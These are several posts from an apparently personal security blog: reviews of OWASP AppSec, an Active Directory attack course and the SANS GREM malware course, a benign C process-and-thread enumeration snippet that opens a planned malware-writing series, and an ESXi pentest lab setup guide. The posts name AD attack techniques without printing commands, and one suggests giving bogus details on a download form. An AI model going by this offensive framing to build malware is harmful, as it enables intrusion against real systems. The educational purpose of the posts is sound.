I really enjoyed my first OWASP Application Security conference. In addition to all the technical knowledge gained I always try my best to network and interact with as many people as possible. I can see myself definitely attending again in the future. There was tons of swag being given away, t-shirts, socks, gadgets you name it. I didn’t participate in the CTF because it ran during the same hours as the conference. That was weird because some people solely did the CTF and didn’t see the talks at the conference. I wish it was more SANs like where it’s after hours but such is life.

Best Part:

The best part is literally all the slides, handouts, cheat-sheets are available online! This was so appalling to me I asked them why wasn’t it a locked resource or something password protected.  The answer was, “If you can get all the value  you need without us teaching it we’re useless” in addition we want you to go back and share the information w/ you teams and colleagues. This is the differentiator OWASP is here to protect the masses and knows we are more effective being collaborative and sharing knowledge. I think that was pretty special! So here you are – the github with all the materials, source code and lecture slides! Cheers.

The post OWASP Global AppSec DC 2019 Review appeared first on Certification Chronicles.

PentesterAcademy Attacking and Defending AD Course Review

16 June 2019 at 16:07

Lately I’ve been more busy than usual. Getting my business off the ground, work, life and other things. I’ve got to get to all the messages & of course say THANK YOU for all the well wishes and kind words. By now you probably know even with all that going on, my free time is selfishly spent exclusively on myself 😈 The course I’m referring to is here Attacking and Defending Active Directory by PentesterAcademy.

Why’d You Even Decide To Take It?

Good question that I feel the need to spend some time on. No exaggeration hundreds of people hit me up asking for advice on certs. Since I’ve never necessarily chased a cert for a new position, promotion or anything like that my stance may not reflect everyone’s exact situation. All my certs came from just wanting to gain the knowledge that the cert provided in my quest to get more diverse and deeper into the different security domains. Of course I try to be targeted going after the most distinguished, the most reputable organizations, but really after completing the course and obtaining the cert is a little sad to me 😟. That’s when the fun stops. I encourage you to just continually just challenge yourself and see if you have a breaking point. There’s always time. Being frustrated at yourself while stuck trying to comprehend something new, that’s complex, is ammo for the brain. I love learning, double points if it’s something totally new. It’s like I can feel the new neural pathways in my head growing. I’m always stuck. I’m always reading things 3 times over but I bet you I won’t continue until I completely absorb what I’m reading. Fight the good fight and be better than you were yesterday. Live by it.

After I passed GREM I was in a somber mood similar to how I feel after every cert when all the happiness wears off. Sometimes as soon as the car ride home a question creeps into my mind and it doesn’t go away. “What’s next?” Giving you guys some context I mainly do Application Security for work. My goal is to be a specialist in a few things and a generalist in many. You know what I don’t have? Red-Team experience (besides the basic definition) and absolutely no knowledge of AD (okay maybe a little). I continued thinking wth 😏 how’s that even possible? Then I thought most my hacking is through flag based scenarios and courses. If you’re compromising a user you’re typically exploiting a service, process, or application running in the context of that user. Once I started researching things like lateral movement, exploiting trust relationships between domains, abusing ACLs I was sold. That was my motivation to pay for the course. Oh yeah. It’s was $250 HA! For the value this is EASILY the best course I ever enrolled in 👏🏾.

What Was It Like?

Incredible! Continuing on “value” I received 36 course videos, a copy of the video slides, lab manual, 30 day access to their AWS AD environment, and a sizable zip with all course tools . Each video taught a topic that had questions attached with them to complete in the lab. This is where you really learn! I watched the videos in order learning from the awesome instructor Nikhil Mittal. I was amazed at the comprehensiveness. It was just what a noob like me needed. I watched each video in order. Things like

  •  Lateral Movement
  • Significant time spent on Domain Enumeration
    • Bloodhound
    • Powerview
    • Mimikatz
    • Powercat
  • Local Privilege Escalation
    • Powerup
  • Domain Persistence
    • Understanding Kerberos Environment
      • Golden Tickets
      • Silver Tickets
      • Skeleton Keys
      • DSRM
      • Custom SSPs
      • Admin SD Holder
      • Abusing ACLS
  • Domain Privilege Escalation
    • Kerberos
    • Constrained & Unconstrained Delegation
    • DNSAdmins
    • Enterprise Admins
  • Cross Forest Trust
    • krbtgt hash and sid history
    • Trust ticket

After I watched the videos the second time I started to do all the task in the lab environment. Since I get obsessed with new things I was rushing home to get in my lab environment everyday spending usually from say 5-10 PM everyday practicing. It took about 2 weeks to finish all 23 task. I’m feeling pretty good about things at this point. It’s dumb to feel this way honestly since everything is brand new to me I feel as if my knowledge is procedural. Meaning if I was tossed a curve ball and things deviated slightly from what the course taught I’d easily toast. So I select the positive side and congratulate myself for grinding for going on 1 month straight with the course. Although I studied for over 3 months straight on other certs I still pat myself on the back for a concerted effort on anything. Hey! If you don’t want to clap for yourself, don’t. Now I go back through the entire course seeing if there’s anything that catches me off guard or feels fuzzy and I review it. Let’s do this! #schedulesexam 😲

Exam #1

The exam drops you into an Active Directory environment as a low-privileged user. Your goal is to gain code execution on 5 of the boxes in 24 hours. I started out pretty good gaining 3 users and 2 boxes in 4 hours and then came hell. One part that stank was some of the tools used throughout the course didn’t necessarily work in the exam. In the course we used plenty of PowerView, Mimikatz, and Microsoft’s AD module. Anyway I enumerate the entire domain, ran Bloodhound did everything and couldn’t figure my way forward. I stay up the entire 24 and come up dry. Didn’t bother submitting exam report 🤒.

Exam #2 (1 week later)

I spend this week reviewing videos on enumeration. I don’t know why but I felt I missed something simple. I start off the exam and gain all privileges that I left off with. I run Bloodhound again after that checking things like sessions, group membership, outbound ACL control. It’s then that I realize I missed something that wasn’t even hidden 🔎. I think back to myself, how could I have missed this it was right there. Then I understand what happened. (always try to think if you come up short on anything – what went wrong and how could I not make that mistake again) So while I was enumerating one of the tools missed it luckily since bloodhound shows similar information I saw it there. I was PUMPED 🙌🤳 at this point. Not to mention I got this like 30 minutes into the 24 hours. I begin pivoting through the domain gaining users and more boxes. 3 hours later I get Domain Admin dump all the hashes in the domain. Game Over. I create an inter-realm tgt gain code execution on the forest domain controller. Finished the report in a hour, proof read it – sent it off. 8 hours later I get the following

Dedication Wins!!

And a few hours after that I receive the following along with a personal email from the instructor himself. Geeked about that 😎. Again, there’s always time.

Overall this course was amazing. A couple things I loved?

  • How the exam seemed to stretch you and isn’t easy. You’ll learn a lot of new things in the exam itself.
  • The responsive and helpfulness of the Active Directory Support Staff. I constantly bothered them with any questions I had. You can’t beat it.

As I’m typing this guess what’s going through my mind. “What’s next?”

The post PentesterAcademy Attacking and Defending AD Course Review appeared first on Certification Chronicles.

GIAC Reverse Engineering Malware (GREM) Review

28 April 2019 at 22:01

New trophies !!

 

Welcome back. What follows is my review of the SANs FOR-610 GIAC Reverse Engineering Malware (GREM)  course led by the magnificent instructor Lenny Zeltser. I intend to not only give you a day-by-day breakdown but also my thoughts, mindset and overall sentiment. But before all of that let’s rewind to Jan 2019.

Fresh off of nailing OSCE I was desperately searching for something to latch onto. Could you imagine how big my eyes were when my boss informed me I would be able to take a SANs training😲. I felt Malware Analysis would compliment my Exploit Development experience in addition make me more valuable at work. Studying is baked into my life I never foresee this ever changing. I love to learn. I love to struggle. The dedication. The disciple. The concerted effort. I love the internal fight I always have with myself. Did I mention this event was in Orlando !? So the day of my flight comes I’m freaking pumped!

3 hour flight was fine landed safely had to strip out the hoodie because it was about 75 degrees & sunny. Checked in received all the course materials and some swag. Grabbed a bite to eat and tried to get a good nights rest. I could barely sleep like a kid on Christmas eve.

This swag is not for sale!

Day 1 – Malware Analysis Fundamentals

If you’ve never (sorry to hear that) been to a SANs training you get a book for each day that you work through. We were provided with 2 VMs one Windows and one REMnux (Lenny created and maintains this it’s a stripped down Ubuntu system pre-loaded with all the tools. Once again if you want a reoccurring theme here it’s he’s awesome & very intelligent) It’s quite intense as you get bombarded with tons of material. After a short introduction he jumps straight into the material. We discussed what malware is & general goals we wish to accomplish with our analysis. Some things that won’t make the sexy list but were important was how to build a analysis lab and how to create and deliver analysis report. Now is when the cool things begin to happen. “Okay class go to malware folder day one and double click on it to begin analyzing your first piece of malware”. I’m like this sounds like a mistake 😂 but let’s do it! We got pretty intimate with this piece of malware analyzing it statically dynamically and a tiny bit of code reversing in IDA. This malware had C2 functionality & dropped an encrypted config file on the system along with persistence. Here are some of the tools we’d come to use for today and remaining days

  • PE Studio
  • Strings/pestr
  • Process Hacker
  • Process Monitor
  • Process Hacker
  • Regshot
  • Wireshark
  • IDA
  • x64 debug
  • fakedns
  • inetsim

After class let out for that day I grabbed a bite to eat and decided to crash instead of going for one of the evening talks.

Day 2 – Reversing Malicious Code

This day I heard was most feared depending on your background. I actually enjoyed it a lot. The entire day was spent inside IDA and looking through the assembly. Some things we learned this day were

  • Intel Processor
  • Registers
  • Pointers
  • Memory Addressing
  • Branching
  • Calling Conventions
  • How functions work
  • The Stack
  • Control Flow

The 2nd half of the taught us how to recognize common API patterns in Malware. Keyloggers, Downloaders, Droppers ect. There was a tiny section on 64-bit code analysis that we didn’t spend much time on.  I didn’t go to any evening talk I crawled in the bed an reviewed the days materials.

Day 3 – Malicious Web and Document Files

This day was my favorite. If yesterday beat you up this day was here to pick you back up. It wasn’t easy it was fun. Since this is a way that most malware is introduced inside organizations I was very interested in this days topics. It didn’t disappoint me! We saw so much naughty malware this day. We started out deobfuscating scripts using browser debuggers, and then using standalone interpreters. Again things are intimate here so you’re learning the internal format down to the nitty gritty of the different document types and the tools you use for analyzing them. There was malicious PDFs, Office Documents (Macros), and RTF documents. What blew my mind this day was the amount of ways that JavaScript can hurt you. And why Windows has binaries to execute JavaScript. I guess being naive I simply thought about JS and what it could do inside the browser. Some tools we used this day were:

  • js (SpiderMonkey)
  • pdf-parser
  • base64dump
  • oledump
  • olevba
  • xor-kpa
  • rtfdump

After this days class I was excited to see what this NetWars hype was all about. So when the time hit I grabbed my machine & headed down.

The atmosphere was incredible 👍❤ being in a room full of hackers and us going head to head. There’s nothing else like it. There was a guy who had over 400 points when the next highest guy had like 50. They took his name off the board because they said they “Didn’t want to depress us anymore” 😂 That guy was insane. I did well actually it was a lot of Linux commands, wireshark analysis. The part that tripped me up was image analysis I struggled with this and lost so much time. I fell from 4th to like 20th by end of first day.

I’m on the board!

Day 4 – In-Depth Malware Analysis

We learned a ton of stuff this day. Recognizing and unpacking malware. Debugging packed malware. The  2nd half of the day we learned and examined a fileless piece of malware. It was wicked! Some topics in the 2nd half of the day we learned were API Hooking and Code Injection. We also spent time learning a little bit of memory forensics. Some tools we used this day were

  • upx
  • scdbg
  • volatility

I decided not go to the 2nd day of netwars. Went on a walk exploring the area where our hotel was and chillen by the pool.

Day 5 – Examining Self-Defending Malware

Awesome day spent learning about malware that fights you back or purposely makes it difficult to analyse. We learned about Process Hollowing and the normal techniques malware authors employ to detect debugging. Some tools used this day were

  • brxor
  • bbcrack
  • floss
  • scylla

Last day of learning & it’s Friday but who care because I’m spent. Went to the room and crashed.

Day 6 – CTF

Get to class at 8:30 and setup my machine, grab my Redbull and prepare for the fight. There’s about 20 people in the class most of them seemed very intelligent. I knew a few of them were fulltime malware analyst but it’s always fun to see where you end up when competing with others. I enjoy the competition. So the CTF was everyone on their own no teams and top 5 people win coins. We had our own scoring server that updated in real time as you earned points so it was intense. For 5 hours we leveraged what we learned to answer questions about different malware samples. Now when we first started on Monday I had to think about everything because it was all new to me. On this day I remember running to the bathroom and thinking damn! You’re not even thinking about this you’re just doing it. Gave myself a bro hug. When the dust settled I had a coin & it was the perfect icing on the cake.

I win !

Studying For The CERT

When I fly back home I immediately reviewed each book. I don’t create an index but I use the color tab thingy’s to mark sections I think are important and also highlight anything relevant of course. The end result of this madness looks similar to this

This was like retaking the entire course it really helped me reinforce topics I knew I was weak on. It also helped me understand where things were in each book. This is valuable because although the exam is open-book you don’t have much time to search for things. After this was done I got access to the MP3 recordings. I listed to all of them in the car, on the train, at lunch, and evening time this was the only thing I did. I went to sleep to Lenny’s voice and woke up to it. This again was like taking the course again it helps tremendously. In between this time I also took the 2 practice test they give you. I scored a 76 on first one and 84 on the second one. It was great to have an idea of the type of questions. So I originally scheduled the exam for a Saturday. At this point I felt like I took the class 3 times and went thru the books like a zillion times. It was Thursday night. I said forget waiting until Saturday you’re taking this exam tomorrow. Luckily the testing center had availability and I rescheduled it. After I did it I though “You’re a fucking fool” 😂 But let’s do this!

The Exam

Wake up gather my materials, buy  a Redbull and a water and off I go. I gave myself ample time to get to the testing center absolutely can’t be late. I got there 1 hour early at 8 AM and they allowed me to take the exam immediately. Astonished I couldn’t bring my Redbull in the testing area so I downed it. Testing at a center is so funny because you can’t have anything besides your materials all your belongings get stored in an assigned locker. They made me lift up my hair, pants legs I was like WTF 😂 those folks would make awesome TSA agents. The exam was HARD but I felt prepared. I finished it in 1 hour and this is what it ended up as

Let’s Go!

I was soo proud of myself! ✊🏿
And when you get 90 (90.7 counts😂) or higher you get an invitation to the GIAC Advisory Board.

I encourage you to take the class if you can but only if it’s with Lenny. He answered 1 million and one of my questions & he gives off good vibes.
Take care guys – until next time.

The post GIAC Reverse Engineering Malware (GREM) Review appeared first on Certification Chronicles.

The Usual Suspects – Malware Snippets – Part 1

12 April 2019 at 21:20

When You Should Be Studying But The Code Calls You.

Prologue

I feel like I should confess. Why? Because I’ve fought with myself for the past hour debating on how to spend this Friday evening. I 100% should be continuing my Malware Analysis Workbook to keep making steady progress in preparation for the exam. GREM should be fun, I’m looking forward to it & blogging about the entire experience. At the moment I really don’t feel like “analyzing” anything. I feel like doing! Attempting to make or break something. The brain wants what the brain wants. Here’s how I rationalize things to myself in these situations. If the thing that I’ve yet to figure out what it is, is in someway somehow related to what I should really be doing then guess what, IT’S FINE. So shoot let’s just start an entirely new series on something I totally just came up with.

I have come to understand that there are patterns in malware. But before that – ask yourself what exactly is malware? Here’s where I think the definition from Lenny’s course rings volumes. It’s incredibly non-technical and very subtle. “Malware is code that is used to perform malicious actions.” This leads you to the realization that it’s not per se the capabilities of the software but the intent of the person using or authoring it. We’ll stop right there because my purpose isn’t malware analysis in this post. (You can wait until I take the certification I”ll be sure to blog about the entire process from the first day of the course through to the cert) It’s about patterns remember. So sir, what are these patterns you speak of?

Software is typically developed in a high level language & compiled into a binary executable. What’s the best language to develop?  I always enjoy this debate because I’ve played with most of them & can usually argue either way depending on the side my opponent takes. Truthfully it’s preference & how familiar the developer is with the language. Different jobs are accomplished utilizing different tools. Some popular high-level languages are C/C++, Python, Delphi, and Java. Now I purposely left out scripting and interpreted languages , I include Python just because it’s awesome & you can usually accomplish the same as a compiled language with it. I know Java and the JVM so you don’t have to beat me up. Majority of malware is written in C/C++ you could also use Python using CTypes and then compile into an executable but let’s not account for that. It shouldn’t surprise you that malware needs to accomplish many of the same task as ordinary software. Things like reading and writing to disk, network communication, spawning child processes, allocate dynamic memory, painting to the screen and the list goes on. Now these things individually aren’t particularly nefarious. But in groups you can get an idea of what it’s trying to do.

How do you leverage C to write malware? You leverage this surprisingly unicornishly resource call the Windows API from MSDN. It’s how you programmatically interact with everything in the Windows environment. And if you’re thinking they missed a inch, they didn’t! So much so, there’s a group of folks who scoured the entire API (documented and undocumented), pre-loaded binaries and DLLs and created LOL-Living Off The Land. To say that the API is rich would be an understatement. You can do any and everything with it because what’s the point of have an Operating System if it’s not extensible & account for each and every obscure thing a developer might ever want to do. Poor Microsoft.

Here’s an example, we get a malware sample and during the static analysis we look at it’s imports and see function calls to, GetKeyState GetAsyncKeyState SetWindowsHookExA. Very quickly you can get a feel for what it potentially might be maybe without even visiting the documentation. In this case a keylogger potentially. This is what I mean when I mention patterns above. This series will begin with the small building blocks before we go full blown into replicating our own malware. This is what I meant when I said I wanted to “attempt to make or break something”. Again, learning is a contact sport and maybe from failing & being stuck so much I don’t mind it. I haven’t developed professionally in years and if I do anything now Python’s usually my go to. So pure C is a challenge I’m totally up for and I hope by the end I can say I improved. I’ve also never written a piece of malware nor it’s components. I encourage you to fight through the cryptic naming conventions grab a C book if you need and just persevere. The best way is to just start. I spun up a VM specifically for developing, downloaded & installed the latest VisualStudio and off I went.

Process & Thread Enumeration

I figured this was an awesome place to begin because it’s pervasive throughout malware. Possibly for anti-debugging, maybe to send off as information gathering to a C2, or searching for vulnerabilities that may aid in privilege escalation. Whatever the reason it’s widespread, gives me a reason to be writing this and is a friendly introduction to C. I will present the code & then explain it in plain English.

1
#include stdio.h
#include Windows.h
#include TlHelp32.h
#include tchar.h

2
BOOL GetProcessList();
BOOL ListAssociatedThreads(DWORD dwProcessID);

3
int main(void)
{
	GetProcessList();
	return 0;
}

4
BOOL GetProcessList()
{
	PROCESSENTRY32 process_structure; 
	HANDLE handleToProcessSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 5

        6
	if (handleToProcessSnapshot == INVALID_HANDLE_VALUE) {
		_tprintf("Failed To Obtain Handle To Process Snapshot");
		return FALSE;
	}

        7
	process_structure.dwSize = sizeof(PROCESSENTRY32);

        8
	if ( !Process32First(handleToProcessSnapshot, &process_structure) ) {
		_tprintf("Failed To Get Obtain Data About First Process - Last Error = %d\n", GetLastError());
		CloseHandle(handleToProcessSnapshot);
		return FALSE;
	}
	do
	{
                9
		_tprintf("\n\n=====================================================");
		_tprintf("\n Process Name:  %s",           process_structure.szExeFile);
		_tprintf("\n Process ID:  0x%08X",         process_structure.th32ProcessID);
		_tprintf("\n Parent Process ID: 0x%08X",   process_structure.th32ParentProcessID);
		_tprintf("\n Thread Count:  %d\n",         process_structure.cntThreads);
              
                10
		ListAssociatedThreads(process_structure.th32ProcessID);
		_tprintf("\n\n=====================================================");

        11
	} while ( Process32Next(handleToProcessSnapshot, &process_structure) );
	CloseHandle( handleToProcessSnapshot );
	return( TRUE );
}

BOOL ListAssociatedThreads( DWORD dwProcessID ) 
{
	THREADENTRY32 thread_structure;
	HANDLE handleToThreadSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );

	if ( handleToThreadSnapshot == INVALID_HANDLE_VALUE ) {
		_tprintf("Failed To Obtain Handle To Thread Snapshot");
		return FALSE;
	}
	thread_structure.dwSize = sizeof( THREADENTRY32 );

	if ( !Thread32First(handleToThreadSnapshot, &thread_structure) ) {
		_tprintf("Failed To Get Obtain Data About First Thread - Last Error = %d\n", GetLastError());
		CloseHandle( handleToThreadSnapshot );
		return FALSE;
	}
	DWORD dwThreadCount = 1;
	do {
		if ( thread_structure.th32OwnerProcessID == dwProcessID ) {
			_tprintf("\tThread ID-%d: 0x%08X\n", dwThreadCount, thread_structure.th32ThreadID);
			dwThreadCount++;
		}
	} while ( Thread32Next(handleToThreadSnapshot, &thread_structure) );
}

You may have noticed that I didn’t bother numbering the second function call. That’s because it’s basically identical to the first. I will illustrate the difference when we reach a piece that’s different.

  1. These are the imports. An import is just a library that holds tons of functions for us to call. They only exist to be used by us so long as we import them first. This makes them happy.
  2. Function declarations. These are used to help with compile time error checking. In this case it says we’re creating 2 function, that are of type Boolean(true/false), their respective names, and any arguments they may expect. It’s like an early warning system. For instance, if we began to write the function body (that one takes an argument named dwProcessID) and we forgot to include it, the compiler understands from our declaration it should be there. So it immediately complains, we call ourselves silly – correct it and move on.
  3. Main method. It’s the entry-point for the entire program. Execution starts here you don’t need to think about it. We call our 1st function here and for clarity include the return statement.
  4. This looks similar to the function declaration but without the ; and statements within the { } brackets. Inside these brackets is our function body (the purpose of the function).
  5. I like to think about a Window’s Handle as a pointer to a system resource. It’s a more abstract level for instance if you wanted to read a file, you’d call the appropriate function – obviously passing it amonst other things the filename. You wouldn’t get a file back or an object you’d get back a Handle. Then all further processing you refer to the handle.In our case we make a call to CreateToolhelp32Snapshot this function comes from the tlhelp32.h import. We search MSDN and understand the arguments to pass it, one being TH32CS_SNAPPROCESS along with the 0 argument says, “Give me a handle snapshot of all the running processes on the system at this point in time”.In the 2nd function this call is also made again but this time with a different 1st argument TH32CS_SNAPTHREAD. Appropriately named since the first functions grabs all the processes then we find each processes associated threads.
  6.  Error checking. From MSDN we know that if the call to get the process snapshot fails it’ll return that symbolic constant INVALID_HANDLE_VALUEYou could make a call to GetLastError() to further debug.
  7. Important. MSDN told me this. You need to set the size field of the structure before you make the call to the next function. If you don’t do this, the call automatically fails.
  8. Call to Process32First this is how we actually make a call to get the first process. It takes as arguments, the handle and the structure who’s member we had to initialize. We put this call inside an if statement, if we encounter an issue we fall into the error printing statements included in that statement and close the handle so it’s not a stray.
  9. Success! If we reach here it means we’re good – we’ve gotten the data associated with our first process in the snapshot. That structure we set the size on now is populated with the relevant data returned from the function call. Some of those things are the process’s name, ID,  it’s parent process ID, thread count and a host of other thing. Break after the call to view all the relevant fields in the structure or just Google it.
  10. Determine which threads belong to this process. As mentioned earlier that function is very similar except it takes a snapshot of all the threads, and then we compare the process ID we pass into the function to the threads parent process ID.
  11. Notice the call to the Process32Next function as the continuing condition for the do-while loop. This function will move to the next process in the snapshot.

Here’s some output:

Except of running the code.

 

Epilogue

We’re going to build up to something awesome I promise. Obviously this is for educational purposes only.
NOTE: If you want to compile the code just remove the numbers I included to explain the different sections.

Until next time!

The post The Usual Suspects – Malware Snippets – Part 1 appeared first on Certification Chronicles.

AD Amusement Park – Part 1

11 April 2019 at 04:47

WHO (Is This Geared Towards?)

  • Penetration Testers
  • System Administrators
  • Technology & System Enthusiast
  • Average Joe (Jill)
  • Anybody That Wants To Read!

WHAT (Will It Encompass?)

The design and provisioning of an AD Penetration Testing Lab created to mimic a corporate network. After which, we will simulate an adversary attacking the network using various techniques. Along the way we will spend time getting to know the key concepts on what being in a “Windows Environment” is all about.

This will be broken into multiple post, each leveraging the previous one & building towards the next. Since this is meant to be comprehensive we will spend a significant amount of time (the initial few post) constructing our lab. Once completed, we’ll detail as many Red-Team scenarios, Pentesting Techniques (or whatever we think is relevant/cool) on the network we created. There is no end in sight! Once I’m tapped out I will solicit friends & peers for techniques to illustrate.Did you catch I said we? That means you also. So do leave comments, email me, to keep this series rolling.

Note: In no way do I or ever claim to be an expert in anything. The best way for me to learn is by doing – making mistakes, trying/failing, and just persevering. With that said my connections are experts in the topics I’ll speak about. If I misspeak or underrepresented anything – point it out, I’m totally open to constructive criticism.

WHEN (Does It Start?)

Aren’t you reading this right now? Duh. Just kidding – I plan on staying pretty consistent. Current date is 4/10/2019 19:12 EST. I would like to be done with the standing the lab up and be on to blogging about the scenarios by beginning of summer at the latest.

WHY (Are You Even Doing This?)

  • Because I Have Unlimited Amounts Of Free Time? This couldn’t be further from the truth !! Let’s see I lead AppSec @ work, am preparing to take GREM, being a husband, being a sibling, being a resource, and being a friend.
  • Because I Get Paid For This? Yeah Ok! If anyone is paying then the funds have never reached me lol. Truthfully I still remember being broke waking up and not having a single dollar. I do pretty well nowadays and I’ll never let money motivate me! Imagine being purely driven by money, and then there’s no money left. That’s why I’ll never ask for a donation, a beer or anything similar. The best thing you could do for me is leave a comment (to help me make it better for the future) or share it with others. You’ll never see an ad on this blog. I take pride in this and it means a lot to me. One of the most valuable things you provide to someone is your time.
  • Because Why Not ?! Okay. Now we’re on to something. The thing to love about having a blog is being able to write about whatever the heck you want! If I wanted to fill this blog up with lavender bunny rabbits or Swedish meatballs, who could tell me not too? Nobody. Fortunately for you guys I’m not that weird! I made a promise to myself that I wouldn’t write to fill up the pages. This syndrome affects primarily new bloggers. After receiving warm fuzzy feedback on their blog, the human in them wants to just put out more post, sacrificing quality just to continue getting complimented. Being self aware is an amazing quality to have. So instead of quantity I focus on quality and content.
  • To Learn Some of you who know the path I took to get where I am currently.  I skipped over an important role that most offensive & defensive folks get. System Administration & Networking. All my knowledge in those areas are self taught mostly from books & hacking. It’s almost like my hobby now. Fun fact, for me is that the more unknown something is to me, the more fascinating it is.
  • To Teach I never want to be the guy that hoards information. Ever. I think it’s disgusting when people are afraid to sharing knowledge for whatever reasons. I also feel like I’m the perfect medium. Almost artistic like a compiler, actually a decompiler. I take some input, perform some translations – modifications and do my best to covey it to you as output in a language that’s most familiar to you. Teaching is loaded because you’re constantly reinforcing what you already knew. So again I win.
  • To Be The Devil’s Advocate We will look through both lenses, that of the attacker as well as the defender. I think this is necessary for completeness. Just think how wrapped up we get in colors and the box we place ourselves in. “I’m a Red-Teamer – I’m a Blue-Teamer – I’m a Purple-Teamer”. In reality there’s 2 sides, the good guys & the bad guys. If you straddle the line, I consider you to be on the bad side. Simple

Okay. With that out of the way – let’s start Part 1 of the series!

I’ll summarize exactly what we’re going to accomplish in this post first, then illustrate it in detail below.

    1. Summary/Disclaimer
    2. Physical System Requirements
      1. Recommendation & What’s in My Environment
    3. ESXI & Hypervisors
      1. Download, Installation, and Deployment
    4. Active Directory & Windows Domains

Summary/Disclaimer:

*Operation Manage Expectations* – Unfortunately or fortunately every marathon starts with a single step. This is our single step. It sets the stage for all subsequent post in this series. With it being the foundation it’s one of the most important. What happens to anything build upon weak foundation? We actually won’t do any hacking here. It’s meant to understand the core concepts and get a handle on getting your lab stood up. (I can’t hear folks sucking their teeth & heading for the EXIT)


Physical System Requirements:

First off, I don’t want to hear any chuckles, laughs or “bruhhh’s” after I reveal what I’m about to say. I’m running all this on a Dell Inspiron 3874 from back in the day! If you’re a person with a fancy beefy server so be it! More power to you. But if you’re more like me, loving to stretch the limits of anything you can touch on, then you can so-called “ball on a budget”. I laughed one day when I read people speculating on what type of equipment & devices I had in my lab. I was like damn this guy is going to be sadly disappointed when I inform him on the current state of affairs going on here lol.  So take what I’m going to list below w/ a grain of salt.

Processor – Depending on the generation I would say you can get away with having an I5 processor. Obviously the newer the better, to handle all the multitasking we’ll be doing and to utilize the advances in technology. Again my old I7 fourth gen does just fine. Ha!

RAM – One of the most important things in the entire stack. This depends on how big you want your environment to be honestly.  I would suggest 32GB and a minimum of 16GB. At the moment I have 12GB and I usually never see more than 50% usage at max load having 5 VMs running and all processing something.

Disk – Ideally you have a large SSD 1TB and a small one 128GB to boot from. My setup is slightly different. I had an 256GB SSD laying around and the desktop came with a 1TB HDD. So I boot the OS from the 256GB SSD and use the HDD for the VM Storage. You actually could boot the OS from a flash drive atleast 4GB if you wanted. I did this before and experience random hanging and freezing so that’s why this time around I decided to use a physical drive.

My Powerhouse Dell Inspiron 3874

*IMPORTANTYou’re free to use whatever Hypervisor you want. I tried all the major ones and settled with VMware ESXI as my favorite. If you’re going to follow this post & build your lab accordingly, ESXI only works with Intel NICs. You’ll need to have one to avoid a situation where you have to patch the ISO to inject open-source (shady) drivers (kernel level rootkit?) into your build. Guess what? That desktop had a Realtek NIC. Irony. No worries I solved this easily by buying and installing one of these.


ESXI & Hypervisors:

I’ll spare you from the dictionary definition which you’re welcome to find here on what a Type 1 hypervisor is.  Type-1 runs directly on the host machines hardware directly and doesn’t have to load an OS first. In comparison to Type-2 which most people are already familiar with some examples, VirtualBox (yuck) – VMWare Workstation (if you’re fortunate) – VMWare Player (if you’re fortunate & the one of your liking.

So what does this do for us? Great question. When we leverage this type of hypervisor we’re able to utilize all the host machines hardware for our VMs. First thing we do is head over and grab the latest ESXI image from VMWare’s website which at the moment is 6.7. YES – you have to create an account.

Downloading latest ESXI image

The ISO is surprisingly small for the shear amount of magic that it provides. The next thing we want to do is burn the ISO to a USB flash drive. There are a few programs I’ve used for this over the years depending on OS but the most reliable one has to be Rufus. Download and install (or run it).

Insert your USB into the machine and run Rufus. You’ll have to point it to the ESXI ISO, it should detect your USB drive letter automatically. Similar to the following:

Writing ESXI image to flash drive

Installation should be quick, less than a minute. Unfortunately the only confirmation you’ll get from Rufus is a Window’s chime and the progress bar reaching 100% visually but sorry no messagebox popup confirmation.

Rufus finished writing image to flash drive

Now that we have our flash drive ready for battle, we insert it into the system we’re using for our lab. Sometimes you’ll hold F2 on system boot or go into the bios, alter the boot order and select the USB to load prior to the Hard Disk. The process for installing ESXI is very simple just click through honestly. But for the sake of completeness I wanted to detail it thoroughly. The initial load will show you some Linux booting output and switch to the following looking screen:

ESXI loading after booting from USB

Click “Enter” to Continue with the installation when paused at the Compatibility prompt. Then F11 to accept the EULA. Continuing on you’ll be prompted to select the disk you want to install ESXI on. If you’re dropping it on another USB make sure it’s insert it VMWare should recognize it. DON’T OVERWRITE THE USB WITH THE INSTALLATION ON IT MISTAKENLY. No matter what choose the correct disk, if you’re using SSD or HDD just make sure you select the correct one. Remember this ISN’T the place where your VMs will be held, although it’s probably inside the same physical system. In my case for illustration purposes I’m installing on a VM so my disk is labeled as such, and looks like the following. (Multiple disk will be listed if applicable)

Installing ESXI on host disk.

Hit “Enter” to Continue. Select your default keyboard layout Swiss German in my case. JK – I selected “US Default” of course & again “Enter” to Continue. At the next screen you’re prompted for a root password, make it whatever you want so long as you remember it

Selecting root password.

Confirm again your pointing to the correct disk before you begin the partition. (Can you tell I screwed up here before?)

Confirming partition to write to

A completed install looks similar to the following.

Completed ESXI Install.

Great Progress! Remove the installation media and reboot.

To save time here’s the assumptions I will make:

  1. You already have at least one Windows Server edition to be your domain controller. Microsoft provides evaluation copy’s for 180 days that you can download directly from them Server 2016 Download. You’ll have to fill out the form (bogus information) to initiate the download. Get creative 🙂
  2. You have at least one client to add to your domain, this could be any Windows OS like 10, 8 (you’re weird), 7 or XP. You can get Windows 10 for free using their Media Creation Tool here. Get creative finding the other editions.

If all went well you’ll boot up to the following:

ESXI Installed & running.

Take note of the IP address ESXI presents to you and browse to the IP. It should be bridged to your LAN. Note: My address is NAT’d since I’m simulating the process on a VM. Not that should have realized that anyway. From this point on you can disconnect the monitor if you like, all the rest of the administration is done through the web application.

Accepting the self signed cert shows the following:

ESXI Web App Login

After logging in your main dashboard provides you a bunch of system information about your physical host and configuration options for your future lab. To deploy a VM first we have to upload an ISO. In ESXI terms the storage that houses the ISO and the resulting VMs is called the datastore. Things are pretty intuitive actually bc the upload process to the datastore is streamlined in the Create/Register VM workflow. Click that button:

ESXI Dashboard

Select “Create a new virtual machine” and click Next as follows:

Deploying a new VM

Give you VM a recognizable name & select the OS version from the dropdown. I named mine DC-2K-16 just to be descriptive. I know it’s going to be my Domain Controller and the OS year. Do whatever makes you happy:

Select VM OS and naming it

You’ll select a datastore, click Next and be presented with the final screen.

VM Provisioning almost complete

Note: We still didn’t upload our ISO to the datastore yet. Now here’s our time. You’re going to click “Browse” from the location row. This will open the datastore browser, there you’ll click “Upload” and then browse your local system to the Windows Server 2016 ISO.

As it’s progressing things should look like this:

Be patient – this is where you get to pause and reflect on your tremendous efforts thus far.

